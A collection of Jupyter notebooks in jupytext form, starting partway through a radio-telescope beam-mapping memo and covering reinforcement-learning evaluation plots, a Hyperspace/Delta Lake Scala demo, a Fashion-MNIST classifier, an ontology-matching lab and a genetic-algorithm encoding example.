observed_beam(plot_data) # Plot the beam and model axs[i].plot(ang-90,model_beam,'k--',label=(r'Model: ' + freq_set)) axs[i].errorbar(theta[5:-3],obs_beam[4:-4],yerr=obs_std[4:-4],label='Data: ' + freq_set) axs[i].set_title(freq_set) axs[i].grid() axs[i].set_ylim([-25,5]) axs[i].set_xlabel(r'Beam Angle ($^\circ$)') axs[i].set_ylabel(r'Amplitude (dB)') plt.show() # - # The beam measurements in the plots above also seem to match well out to ~$12^\circ$. We can also recreate the plots above for 10 MHz bandwidth images beginning at 110 MHz and ending at 190 MHz. # + freq_range = ['110-120MHz','120-130MHz', '130-140MHz','140-150MHz', '150-160MHz','160-170MHz', '170-180MHz','180-190MHz'] freq_ends = [[110,120], [120,130], [130,140], [140,150], [150,160], [160,170], [170,180], [180,190]] fig, axs = plt.subplots(4,2, figsize=(15, 20), facecolor='w', edgecolor='k') fig.subplots_adjust(hspace = .3) axs = axs.ravel() for i,freq_set in enumerate(freq_range): # Find the files and track the sources files = np.sort(glob('/data6/HERA/HERA_imaging/IDR2/' + freq_set + '/imgs/*fits')) plot_data = track_sources(files,tb) cleaned_set = {k: v for k,v in plot_data.iteritems() if len(v['Flux']) == 77} # Model the beam for a range of frequencies freqs = np.arange(freq_ends[i][0],freq_ends[i][1]) model_beam = [] for freq in freqs: ang, beam = hera_beam_freq_slice(hera_beam, freq, ang_from_center=15, n=100) model_beam.append(beam) model_beam = np.mean(model_beam, axis = 0) model_beam /= model_beam.max() model_beam = 10*np.log10(model_beam) # Find the observed beam and standard deviation for error bars theta, obs_beam, obs_std = observed_beam(cleaned_set) # Shift the higher frequency plots down to account for the center dip if i == 5: obs_beam -= 0.5 if i == 6: obs_beam -= 0.75 if i == 7: obs_beam -= 1.25 # Plot the beam and model axs[i].plot(ang-90,model_beam,'k--',label=(r'Model: ' + freq_set)) axs[i].errorbar(theta[5:-3],obs_beam[4:-4],yerr=obs_std[4:-4],label='Data: ' + freq_set) axs[i].set_title(freq_set) axs[i].grid() axs[i].set_ylim([-25,5]) axs[i].set_xlabel(r'Beam Angle ($^\circ$)') if i % 2 == 0: axs[i].set_ylabel(r'Amplitude (dBi)') plt.show() # - # We can see in this set of plots that the beam measurements match the model well, but not quite as well as 20 MHz bandwidth images. One interesting observation that can be made from these plots is that at higher frequencies there are dips in the beam measurements near zenith that doesn't appear in the 20 MHz bandwidth measurements. This may be a result of the weighting that was used for imaging the data or possibly sidelobes from other sources contaminating the measurement. Regardless, this is something that will require further investigation. # ## 4. Future Work # - Investigate the cause of the dips near the beam center in the higher frequency 10 MHz bandwidth beam measurements # - Why don't the same dips appear in 20 MHz bandwidth beam measurements # - Current IDR2.1 images are using a briggs weighting parameter in CASA's CLEAN command that is shifted more closely to uniform # - What might the effect of imaging with uniform and natural weighting have on the shape of the observed beam. # - Model the noise level for certain frequencies to test whether or not we are actually hitting the noise level # - Simple comparison might be using the rms of noise on the edge of the image to see if the value is consistent with the "noise" level we see in the beam measurement
notebooks/Beam_Mapping_Memo.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import numpy as np import matplotlib.pyplot as plt from matplotlib import rc rc('font', **{'family': 'serif', 'sans-serif': ['tgpagella'], 'size': 18}) rc('text', usetex=True) from utils import moving_average import laserhockey.hockey_env as h_env # - def plot_training_episode_return(eval_dicts, labels, colors): print('Episode return during training:') plt.figure(figsize=(10, 4)) for i, eval_dict in enumerate(eval_dicts): train_rewards = eval_dict['train_rewards'] w = 400 plt.plot( moving_average(train_rewards, w), label=f'{labels[i]}', linewidth=1.5, color=colors[i] ) plt.xlabel('Episodes') plt.ylabel('Return') plt.legend(loc='lower right') plt.grid() plt.show() def plot_evaluation_episode_return(eval_dicts, labels, colors, w=10, mode='valid', eval_freq=5000): print('Average episode return in the evaluation during training:') plt.figure(figsize=(10, 4)) for i, eval_dict in enumerate(eval_dicts): eval_rewards = eval_dict['eval_rewards'] eval_mean = np.asarray([np.mean(eval_step) for eval_step in eval_rewards]) eval_std = np.asarray([np.std(eval_step) for eval_step in eval_rewards]) t = np.arange(0, eval_freq * len(eval_mean), eval_freq) t = t[:-w + 1] if mode == 'valid' else t plt.plot( t, moving_average(eval_mean, w, mode=mode), label=f'{labels[i]}', linewidth=1.5, color=colors[i] ) plt.fill_between( t, moving_average(eval_mean + eval_std / 4, w, mode=mode), moving_average(eval_mean - eval_std / 4, w, mode=mode), alpha=0.2, color=colors[i] ) plt.xlabel('Time steps') plt.ylabel('Average Return') plt.legend(loc='lower right') plt.grid() plt.show() def plot_final_evaluation_return(eval_dicts, labels, colors): print('Return in the final evaluation:') plt.figure(figsize=(10, 4)) for i, eval_dict in enumerate(eval_dicts): final_eval_rewards = eval_dict['final_eval_rewards'] if len(final_eval_rewards) == 0: final_eval_rewards = eval_dict['eval_rewards'][-1] bp = plt.boxplot( [final_eval_rewards], positions=[i + 1], labels=[labels[i]], patch_artist=True, showmeans=True, meanline=True, boxprops=dict(facecolor='white', color=colors[i]), capprops=dict(color=colors[i]), whiskerprops=dict(color=colors[i]), flierprops=dict(markeredgecolor=colors[i], color=colors[i]), medianprops=dict(color='black'), meanprops=dict(color='grey') ) plt.ylabel('Return') plt.legend([bp['medians'][0], bp['means'][0]], ['median', 'mean']) plt.show() def print_win_rates(eval_dicts, labels): for i, eval_dict in enumerate(eval_dicts): final_eval_results = eval_dict['final_eval_results'] if len(final_eval_results) == 0: final_eval_results = eval_dict['eval_results'][-1] num_results = len(final_eval_results) final_eval_results = np.asarray(final_eval_results) win_rate = np.sum(final_eval_results == 10.0) / num_results tie_rate = np.sum(final_eval_results == 0.0) / num_results loss_rate = np.sum(final_eval_results == -10.0) / num_results print(f'{labels[i]}: ' + f'Win-rate = {win_rate:.2f}, ' + f'Tie-rate = {tie_rate:.2f}, ' + f'Loss-rate = {loss_rate:.2f}') def plot_all(eval_dicts, labels, colors=['C0', 'C1', 'C3']): plot_training_episode_return(eval_dicts, labels, colors) plot_evaluation_episode_return(eval_dicts, labels, colors) plot_final_evaluation_return(eval_dicts, labels, colors) print_win_rates(eval_dicts, labels) # Evaluate all TD3 modifications against the weak and strong opponent eval_dicts = [] eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+per.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+obs_norm.npy', allow_pickle=True).item()) labels = ['TD3', 'TD3 + PER', 'TD3 + ON'] plot_all(eval_dicts, labels) # Evaluate all TD3 modifications against the weak opponent eval_dicts = [] eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline_weak.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline_weak+per.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline_weak+obs_norm.npy', allow_pickle=True).item()) labels = ['TD3', 'TD3 + PER', 'TD3 + ON'] plot_all(eval_dicts, labels) # Evaluate the batch size eval_dicts = [] eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+batch_size_256.npy', allow_pickle=True).item()) labels = ['batch size = 100', 'batch size = 256'] plot_all(eval_dicts, labels) # Evaluate the hidden dim eval_dicts = [] eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+hidden_dim_128.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+hidden_dim_512.npy', allow_pickle=True).item()) labels = ['hidden dim = 128', 'hidden dim = 256', 'hidden dim = 512'] plot_all(eval_dicts, labels, colors=['C3', 'C0', 'C1']) # Evaluate the target update proportion tau eval_dicts = [] eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+tau_0_0025.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+tau_0_0100.npy', allow_pickle=True).item()) labels = ['tau = 0.0025', 'tau = 0.005', 'tau = 0.010'] plot_all(eval_dicts, labels, colors=['C3', 'C0', 'C1']) # Evaluate the policy noise sigma_tilde eval_dicts = [] eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+policy_noise_0_1.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline.npy', allow_pickle=True).item()) eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_baseline+policy_noise_0_4.npy', allow_pickle=True).item()) labels = ['sigma = 0.1', 'sigma = 0.2', 'sigma = 0.4'] plot_all(eval_dicts, labels, colors=['C3', 'C0', 'C1']) # Evaluate TD3 with self-play eval_dicts = [] eval_dicts.append(np.load(f'results/TD3_Hockey-v0_NORMAL_all_improvements+self_play.npy', allow_pickle=True).item()) labels = ['TD3 with self-play'] plot_all(eval_dicts, labels)
eval.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Initialize the ckan environment and requests session # + import os from dataflows import Flow, printer from dataflows_shell.processors import html_requests CKAN_PIPELINES_AUTH = os.environ['CKAN_URL_AUTH'] Flow( html_requests('get', f'https://{CKAN_PIPELINES_AUTH}@pipelines.odata.org.il/ckan/data/pipelines/upload_via_email/errors/', 'r.html.links' ), printer() ).process()[1] # -
ckan/ckanext-odata_org_il/ckanext/odata_org_il/pipelines/debug upload via email.ipynb
// -*- coding: utf-8 -*- // --- // jupyter: // jupytext: // text_representation: // extension: .scala // format_name: light // format_version: '1.5' // jupytext_version: 1.14.4 // kernelspec: // display_name: Synapse Spark // name: synapse_spark // --- // + [markdown] nteract={"transient": {"deleting": false}} // # Hyperspace for Delta Lake // // [Hyperspace](https://github.com/microsoft/hyperspace) now supports Delta Lake as its data source. This notebook covers how Hyperspace works with Delta Lake tables and updates on the tables. // // + [markdown] nteract={"transient": {"deleting": false}} // ### Setup configurations // + val sessionId = scala.util.Random.nextInt(1000000) val dataPath = s"/hyperspace/data-$sessionId"; val indexLocation = s"/hyperspace/indexes-$sessionId" // Use a random index location to avoid conflicts while using the notebook. spark.conf.set("spark.hyperspace.system.path", indexLocation) // Use HTML as a display mode. spark.conf.set("spark.hyperspace.explain.displayMode", "html") // Enable Hybrid scan regardless of the amount of data being appended/deleted. spark.conf.set("spark.hyperspace.index.hybridscan.maxAppendedRatio", "0.99") // default: 0.3 spark.conf.set("spark.hyperspace.index.hybridscan.maxDeletedRatio", "0.99") // default: 0.2 // + [markdown] nteract={"transient": {"deleting": false}} // ### Data preparation // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} import spark.implicits._ import org.apache.spark.sql.DataFrame // Sample department records val departments = Seq( (10, "Accounting", "New York"), (20, "Research", "Dallas"), (30, "Sales", "Chicago"), (40, "Operations", "Boston")) // Sample employee records val employees = Seq( (7369, "SMITH", 20), (7499, "ALLEN", 30), (7521, "WARD", 30), (7566, "JONES", 20), (7698, "BLAKE", 30), (7782, "CLARK", 10), (7788, "SCOTT", 20), (7839, "KING", 10), (7844, "TURNER", 30), (7876, "ADAMS", 20), (7900, "JAMES", 30), (7934, "MILLER", 10), (7902, "FORD", 20), (7654, "MARTIN", 30)) val empData = employees.toDF("empId", "empName", "deptId") val deptData = departments.toDF("deptId", "deptName", "location") val empLocation = s"$dataPath/employees" val deptLocation = s"$dataPath/departments" empData.write.format("delta").mode("overwrite").save(empLocation) deptData.write.format("delta").mode("overwrite").save(deptLocation) // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} val empDF = spark.read.format("delta").load(empLocation) val deptDF = spark.read.format("delta").load(deptLocation) // Disable BroadcastHashJoin so that Spark™ will use SortMergeJoin that Hyperspace indexes can optimize. spark.conf.set("spark.sql.autoBroadcastJoinThreshold", -1) val eqJoin = empDF. join(deptDF, empDF("deptId") === deptDF("deptId")). select(empDF("empName"), deptDF("deptName")) eqJoin.show // + [markdown] nteract={"transient": {"deleting": false}} // ### Create Hyperspace indexes over Delta Lake tables // // Hyperspace supports Delta Lake through an extensible data source builder framework. // In order to create and apply Hyperspace indexes on Delta Lake tables, you need to register Delta Lake source builder. // // spark.conf.set("spark.hyperspace.index.sources.fileBasedBuilders", // "**com.microsoft.hyperspace.index.sources.delta.DeltaLakeFileBasedSourceBuilder**,com.microsoft.hyperspace.index.sources.default.DefaultFileBasedSourceBuilder") // // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} import com.microsoft.hyperspace._ import com.microsoft.hyperspace.index._ // Register delta table source builder. spark.conf.set( "spark.hyperspace.index.sources.fileBasedBuilders", "com.microsoft.hyperspace.index.sources.delta.DeltaLakeFileBasedSourceBuilder," + "com.microsoft.hyperspace.index.sources.default.DefaultFileBasedSourceBuilder") // Enable source lineage to support the scenario with deleted files. spark.conf.set("spark.hyperspace.index.lineage.enabled", "true") val hyperspace = Hyperspace() val empIndexConfig = IndexConfig("empIndex", Seq("deptId"), Seq("empName")) val deptIndexConfig = IndexConfig("deptIndex", Seq("deptId"), Seq("deptName")) hyperspace.createIndex(empDF, empIndexConfig) hyperspace.createIndex(deptDF, deptIndexConfig) // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Enable Hypperspace to apply indexes. // For simplicity, FilterIndexRule is disabled in this demo. spark.enableHyperspace() // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Scenario: check if newly created indexes are applied. val eqJoin = empDF. join(deptDF, empDF("deptId") === deptDF("deptId")). select(empDF("empName"), deptDF("deptName")) eqJoin.show hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) } // + [markdown] nteract={"transient": {"deleting": false}} // ### Append data // // With Hybrid Scan, you can still utilize Hyperspace indexes after appending data to the table. // // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Add new employees. val newEmployees = Seq( (8000, "NEW-EMPLOYEE-1", 30), (8001, "NEW-EMPLOYEE-2", 10), (8002, "NEW-EMPLOYEE-3", 20), (8003, "NEW-EMPLOYEE-4", 30)) newEmployees.toDF("empId", "empName", "deptId").write.format("delta").mode("append").save(empLocation) val latestEmpDF = spark.read.format("delta").load(empLocation) latestEmpDF.show // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Scneario: Hybrid scan is off. spark.conf.set("spark.hyperspace.index.hybridscan.enabled", "false") val eqJoin = latestEmpDF. join(deptDF, latestEmpDF("deptId") === deptDF("deptId")). select(latestEmpDF("empName"), deptDF("deptName")) eqJoin.show hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) } // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Scenario: Hybrid Scan is on. spark.conf.set("spark.hyperspace.index.hybridscan.enabled", "true") val eqJoin = latestEmpDF. join(deptDF, latestEmpDF("deptId") === deptDF("deptId")). select(latestEmpDF("empName"), deptDF("deptName")) hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) } eqJoin.show // + [markdown] nteract={"transient": {"deleting": false}} // ### Incremental refresh // // Other than using Hybrid Scan, you can also incrementally build Hyperspace indexes only for appended and deleted data. // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Incrementally build index on new employees only. hyperspace.refreshIndex("empIndex", "incremental") // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Show refreshed index only contains new data. spark.read.parquet(s"$indexLocation/empIndex/v__=1").show // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Scenario: Check if refreshed index is applied. val eqJoin = latestEmpDF. join(deptDF, latestEmpDF("deptId") === deptDF("deptId")). select(latestEmpDF("empName"), deptDF("deptName")) hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) } eqJoin.show // + [markdown] nteract={"transient": {"deleting": false}} // ### Update data // // Updated data to the table can be handled as deleted and appended data by using Hybrid Scan or Incremental refresh. // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} import io.delta.tables._ import org.apache.spark.sql.functions._ val empDeltaTable = DeltaTable.forPath(spark, empLocation) // Append "SPEICAL" to the "NEW-EMPLOYEE-2"'s name. empDeltaTable.update( col("empName") === ("NEW-EMPLOYEE-2"), Map("empName" -> (concat(col("empName"), lit("-SPECIAL"))))) empDeltaTable.history.show(truncate = false) empDeltaTable.toDF.show(truncate = false) // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Scneario: handle updated data. val updatedEmpDF = empDeltaTable.toDF val eqJoin = updatedEmpDF. join(deptDF, updatedEmpDF("deptId") === deptDF("deptId")). select(updatedEmpDF("empName"), deptDF("deptName")) eqJoin.show(truncate = false) hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) } // + [markdown] nteract={"transient": {"deleting": false}} // ### Enhancement of Delta Lake time travel query // // For a time travel query with an old table version, the latest version of the index can be used with Hybrid Scan, but usually there could be many appended and/or deleted files which reduce the benefit of indexes. // To optimize it, Hyperspace tracks the history of the index version and table version for each refresh time and selects the closest index version based on the history. // // // Note that this feature is not available in the current Hyperspace version and will be delivered in the next release. // + jupyter={"outputs_hidden": false, "source_hidden": false} nteract={"transient": {"deleting": false}} // Scenario: Time travel to initial version of employees. val oldEmpOnlyDF = spark.read.format("delta").option("versionAsOf", 0).load(empLocation) val eqJoin = oldEmpOnlyDF. join(deptDF, oldEmpOnlyDF("deptId") === deptDF("deptId")). select(oldEmpOnlyDF("empName"), deptDF("deptName")) hyperspace.explain(eqJoin, verbose = true) { displayHTML(_) } eqJoin.show
notebooks/scala/Hyperspace for Delta Lake.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Classifying images from Fashion MNIST using feedforward neural networks # # Dataset source: https://github.com/zalandoresearch/fashion-mnist # Detailed tutorial: https://jovian.ml/aakashns/04-feedforward-nn # + # Uncomment and run the commands below if imports fail # # !conda install numpy pandas pytorch torchvision cpuonly -c pytorch -y # # !pip install matplotlib --upgrade --quiet # - import torch import torchvision import numpy as np import matplotlib.pyplot as plt import torch.nn as nn import torch.nn.functional as F from torchvision.datasets import FashionMNIST from torchvision.transforms import ToTensor from torchvision.utils import make_grid from torch.utils.data.dataloader import DataLoader from torch.utils.data import random_split # %matplotlib inline project_name='fashion-feedforward-minimal' # ## Preparing the Data dataset = FashionMNIST(root='data/', download=True, transform=ToTensor()) test_dataset = FashionMNIST(root='data/', train=False, transform=ToTensor()) val_size = 10000 train_size = len(dataset) - val_size train_ds, val_ds = random_split(dataset, [train_size, val_size]) len(train_ds), len(val_ds) batch_size=128 train_loader = DataLoader(train_ds, batch_size, shuffle=True, num_workers=4, pin_memory=True) val_loader = DataLoader(val_ds, batch_size*2, num_workers=4, pin_memory=True) test_loader = DataLoader(test_dataset, batch_size*2, num_workers=4, pin_memory=True) for images, _ in train_loader: print('images.shape:', images.shape) plt.figure(figsize=(16,8)) plt.axis('off') plt.imshow(make_grid(images, nrow=16).permute((1, 2, 0))) break # ## Model def accuracy(outputs, labels): _, preds = torch.max(outputs, dim=1) return torch.tensor(torch.sum(preds == labels).item() / len(preds)) class MnistModel(nn.Module): """Feedfoward neural network with 1 hidden layer""" def __init__(self, in_size, out_size): super().__init__() # hidden layer self.linear1 = nn.Linear(in_size, 16) # hidden layer 2 self.linear2 = nn.Linear(16, 32) # output layer self.linear3 = nn.Linear(32, out_size) def forward(self, xb): # Flatten the image tensors out = xb.view(xb.size(0), -1) # Get intermediate outputs using hidden layer 1 out = self.linear1(out) # Apply activation function out = F.relu(out) # Get intermediate outputs using hidden layer 2 out = self.linear2(out) # Apply activation function out = F.relu(out) # Get predictions using output layer out = self.linear3(out) return out def training_step(self, batch): images, labels = batch out = self(images) # Generate predictions loss = F.cross_entropy(out, labels) # Calculate loss return loss def validation_step(self, batch): images, labels = batch out = self(images) # Generate predictions loss = F.cross_entropy(out, labels) # Calculate loss acc = accuracy(out, labels) # Calculate accuracy return {'val_loss': loss, 'val_acc': acc} def validation_epoch_end(self, outputs): batch_losses = [x['val_loss'] for x in outputs] epoch_loss = torch.stack(batch_losses).mean() # Combine losses batch_accs = [x['val_acc'] for x in outputs] epoch_acc = torch.stack(batch_accs).mean() # Combine accuracies return {'val_loss': epoch_loss.item(), 'val_acc': epoch_acc.item()} def epoch_end(self, epoch, result): print("Epoch [{}], val_loss: {:.4f}, val_acc: {:.4f}".format(epoch, result['val_loss'], result['val_acc'])) # ## Using a GPU torch.cuda.is_available() def get_default_device(): """Pick GPU if available, else CPU""" if torch.cuda.is_available(): return torch.device('cuda') else: return torch.device('cpu') device = get_default_device() device def to_device(data, device): """Move tensor(s) to chosen device""" if isinstance(data, (list,tuple)): return [to_device(x, device) for x in data] return data.to(device, non_blocking=True) class DeviceDataLoader(): """Wrap a dataloader to move data to a device""" def __init__(self, dl, device): self.dl = dl self.device = device def __iter__(self): """Yield a batch of data after moving it to device""" for b in self.dl: yield to_device(b, self.device) def __len__(self): """Number of batches""" return len(self.dl) train_loader = DeviceDataLoader(train_loader, device) val_loader = DeviceDataLoader(val_loader, device) test_loader = DeviceDataLoader(test_loader, device) # ## Training the model # + def evaluate(model, val_loader): outputs = [model.validation_step(batch) for batch in val_loader] return model.validation_epoch_end(outputs) def fit(epochs, lr, model, train_loader, val_loader, opt_func=torch.optim.SGD): history = [] optimizer = opt_func(model.parameters(), lr) for epoch in range(epochs): # Training Phase for batch in train_loader: loss = model.training_step(batch) loss.backward() optimizer.step() optimizer.zero_grad() # Validation phase result = evaluate(model, val_loader) model.epoch_end(epoch, result) history.append(result) return history # - input_size = 784 num_classes = 10 model = MnistModel(input_size, out_size=num_classes) to_device(model, device) history = [evaluate(model, val_loader)] history history += fit(5, 0.5, model, train_loader, val_loader) history += fit(5, 0.1, model, train_loader, val_loader) losses = [x['val_loss'] for x in history] plt.plot(losses, '-x') plt.xlabel('epoch') plt.ylabel('loss') plt.title('Loss vs. No. of epochs'); accuracies = [x['val_acc'] for x in history] plt.plot(accuracies, '-x') plt.xlabel('epoch') plt.ylabel('accuracy') plt.title('Accuracy vs. No. of epochs'); # ## Prediction on Samples def predict_image(img, model): xb = to_device(img.unsqueeze(0), device) yb = model(xb) _, preds = torch.max(yb, dim=1) return preds[0].item() img, label = test_dataset[0] plt.imshow(img[0], cmap='gray') print('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)]) evaluate(model, test_loader) # ## Save and upload saved_weights_fname='fashion-feedforward.pth' torch.save(model.state_dict(), saved_weights_fname) # !pip install jovian --upgrade --quiet pip install --upgrade pip import jovian jovian.commit(project=project_name, environment=None, outputs=[saved_weights_fname])
.ipynb_checkpoints/fashion-feedforward-minimal-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # ### Dependencies from owlready2 import * #Shoudl be imported after owlready from rdflib import Graph # ### Methods to get the entity labels # + def getClasses(onto): return onto.classes() def getDataProperties(onto): return onto.data_properties() def getObjectProperties(onto): return onto.object_properties() def getIndividuals(onto): return onto.individuals() def getRDFSLabelsForEntity(entity): #if hasattr(entity, "label"): return entity.label def getRDFSLabelsForEntity(entity): #if hasattr(entity, "label"): return entity.label # - # ### Load ontology and print labels # + #Load ontology and print 5 classes with labels #Conference ontologies do not contain rdfs:label but a URI with a readable name urionto="cmt.owl" #urionto="ekaw.owl" #urionto="confOf.owl" #human and mouse contain rdfs:label but the URI has a concept ID #urionto="human.owl" #urionto="mouse.owl #Method from owlready onto = get_ontology(urionto).load() print("Classes in Ontology: " + str(len(list(getClasses(onto))))) i=0 for cls in getClasses(onto): i+=1 #Name of entity in URI. But in some cases it may be a #code like in mouse and human anatomy ontologies print(cls.iri) print("\t"+cls.name) #Labels from RDFS label print("\t"+str(getRDFSLabelsForEntity(cls))) if i==5: break # - # ### Method to compute Precision and Recall def compareWithReference(reference_mappings_file, system_mappings_file): ref_mappings = Graph() ref_mappings.parse(reference_mappings_file, format="ttl") system_mappings = Graph() system_mappings.parse(system_mappings_file, format="ttl") #We calculate precision and recall via true positives, false positives and false negatives #https://en.wikipedia.org/wiki/Precision_and_recall tp=0 fp=0 fn=0 for t in system_mappings: if t in ref_mappings: tp+=1 else: fp+=1 for t in ref_mappings: if not t in system_mappings: fn+=1 precision = tp/(tp+fp) recall = tp/(tp+fn) f_score = (2*precision*recall)/(precision+recall) #print(tp, tp2) #print(fp) #print(fn) print("Comparing '" + system_mappings_file + "' with '" + reference_mappings_file) print("\tPrecision: " + str(precision)) print("\tRecall: " + str(recall)) print("\tF-Score: " + str(f_score)) # ### Check results # + reference_mappings="anatomy-reference.ttl" system_mappings="anatomy-example-system.ttl" compareWithReference(reference_mappings, system_mappings) # For the lab you should compare, for example, # cmt-confOf-reference.ttl with the cmt-confOf-your-system.ttl you generate. # compareWithReference("cmt-confOf-reference.ttl", "cmt-confOf-your-system.ttl") # -
lab8/lab8_notebook.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/julianovale/optimization_metaheuristics_python/blob/master/0005_continuous_problem_Genetic_Algorithm.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="fUUSePo8fmQX" # Função objetivo: # # Min Z = (x^2 + y - 11)^2 + (x + y^2 - 7)^2 # # -6 <= x, y <= 6 # # Solução ótima = 0.0 # + id="zlEojYK3m9Ss" import numpy as np from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt import random # + colab={"base_uri": "https://localhost:8080/", "height": 248} id="QgZFWqocfabb" outputId="85ee6fb9-f341-4ad3-9765-abb3da3c52a2" def fun(x, y): return (x**2 + y - 11)**2 + (x + y**2 - 7)**2 fig = plt.figure() ax = fig.add_subplot(111, projection='3d') x = y = np.arange(-6.0, 6.0, 0.01) X, Y = np.meshgrid(x, y) zs = np.array(fun(np.ravel(X), np.ravel(Y))) Z = zs.reshape(X.shape) ax.plot_surface(X, Y, Z, cmap = 'rainbow') ax.set_xlabel('X Label') ax.set_ylabel('Y Label') ax.set_zlabel('Z Label') plt.show() # + colab={"base_uri": "https://localhost:8080/"} id="XGAH_yKcoKT5" outputId="a0bba354-4217-4740-8c4a-5495a6bc806a" y_array = np.array([1,1,0,1]) # y x_array = np.array([0,1,1,0]) # x chromosome_test = np.concatenate((y_array, x_array)) chromosome_test # + id="RcM8NqbE0UMj" # os índices poderiam ser (0, 1, 2, 3, # 4, 5, 6, 7) # ou # os índices poderiam ser ([-8], [-7], [-6], [-5], # [-4], [-3], [-2], [-1]) # # bit = gene, chamamos de bit porque são 0 ou 1 (binary digit) # # exemplos para x: (bit*(2^z)): # (0*(2^0))+(1*(2^1))+(1*(2^2))+(0*(2^3)) # ([4]*(2^0))+([5]*(2^1))+([6]*(2^2))+([7]*(2^3)) # ([-1]*(2^0))+([-2]*(2^1))+([-3]*(2^2))+([-4]*(2^3)) # # função objetivo: f(x, y) = (x**2 + y - 11)**2 + (x + y**2 - 7)**2 # exemplo de decodificação para x: (sum(bit_x*(2^z))* precision_x + lb_x) ##### up = upper bound; lb = lower bound. # exemplo de precisão para x: (up_x - lb_x) / ((2^len_x)-1) # + colab={"base_uri": "https://localhost:8080/"} id="lqZdDlhTw2NT" outputId="0d42096a-3502-45a2-f1aa-466f538dd254" print("### para a variável x ###") z = 0 # porque se começa em 2^0 na fórmula t = 1 # porque nós vamos começar no último elemento [índice -1] decrescendo em 1 x_bit_sum = 0 for i in range(len(chromosome_test)//2): print() print('o índice é: ',-t) print('o bit é: ',chromosome_test[-t]) print('o z para {} é: {}'.format(chromosome_test[-t],z)) x_bit = chromosome_test[-t]*(2**z) print("{}*(2^{}) = {}".format(chromosome_test[-t],z,x_bit)) x_bit_sum += x_bit t += 1 z += 1 print() print("sum(bit*(2^z)) is: ",x_bit_sum) # + colab={"base_uri": "https://localhost:8080/"} id="Ml9JYrA11RpH" outputId="da05b3aa-385c-46c2-f4f0-a99bcef94c97" print("### para a variável y ###") z = 0 # porque se começa em 2^0 na fórmula t = 1 + len(chromosome_test)//2 # porque nós vamos começar na metade para y, [índice -5] decrescendo em 1 y_bit_sum = 0 for i in range(len(chromosome_test)//2): print() print('o índice é: ',-t) print('o bit é: ',chromosome_test[-t]) print('o z para {} é: {}'.format(chromosome_test[-t],z)) y_bit = chromosome_test[-t]*(2**z) print("{}*(2^{}) = {}".format(chromosome_test[-t],z,y_bit)) y_bit_sum += y_bit t += 1 z += 1 print() print("sum(bit*(2^z)) is: ",y_bit_sum)
0005_continuous_problem_Genetic_Algorithm.ipynb
